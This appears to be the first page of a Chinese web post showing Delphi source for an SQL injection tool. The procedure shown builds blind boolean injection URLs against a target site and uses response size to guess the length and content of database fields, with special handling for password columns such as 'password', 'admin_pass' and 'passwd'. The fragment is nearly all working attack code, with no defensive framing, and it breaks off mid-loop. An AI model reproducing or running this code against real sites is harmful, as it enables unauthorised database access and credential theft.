|
procedure TMainForm.GuessContProc(ListInt: integer); {SQL注入 - 多线程猜解字段内容}
function SQLTextFunc(URl, TopStr, TableName, FieldName, LevelStr: string; Len: integer): string;
begin
Result := Url + ’%20and%20exists(select%20*%20from%20’ + TableName +’%20where%20len(’ + FieldName + ’)’ + LevelStr + IntToStr(Len) + ’%20and%20id=(Select%20max(id)%20From%20’ + TableName +’%20where%20id%20in%20(select%20top%20’ + TOPStr + ’%20id%20from%20’ + TableName + ’%20Order%20by%20id)))’
end;
var
TableName: string;
FieldName, S: string;
ContentInt: integer;
i, Len, LengthInt, N: integer;
GridCount: integer;
Colu: TColumn;
FlagBool: boolean;
begin
Len := 0;
LengthInt := 0;
FlagBool := True;
TableName := TableNameLst.Items[TableNameLst.Itemindex];
FieldName := Memo2.Lines[ListInt];
if (LowerCase(FieldName) = ’password’) or (LowerCase(FieldName) = ’pass’) or
(LowerCase(FieldName) = ’admin_pass’) or (FieldName = ’密码’) or
(LowerCase(FieldName) = ’userpassword’) or (LowerCase(FieldName) = ’passwd’) then
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, 16), 800);
if ContentInt >= and1Num then
begin
SqlResultMemo.Lines.Add(FieldName + ’长度: 16’);
LengthInt := 16
end
else
begin
while (Len <= 50) and (FlagBool) do
begin
application.ProcessMessages;
inc(Len, 2);
Pane1.Caption := ’正在检测长度:Len(’ + FieldName + ’)=’ + inttostr(Len);
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’<=’, Len), 800);
if ContentInt >= and1Num then
begin
for N := Len - 1 to Len do
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);
if ContentInt >= and1Num then
begin
LengthInt := N;
SqlResultMemo.Lines.Add(FieldName + ’长度: ’ + inttostr(N));
FlagBool := False;
Break;
end; // if
end; // for
end; // if
end; // while
end;
end
else
begin
while (Len <= 50) and (FlagBool) do
begin
application.ProcessMessages;
[1] [2] 下一页 |
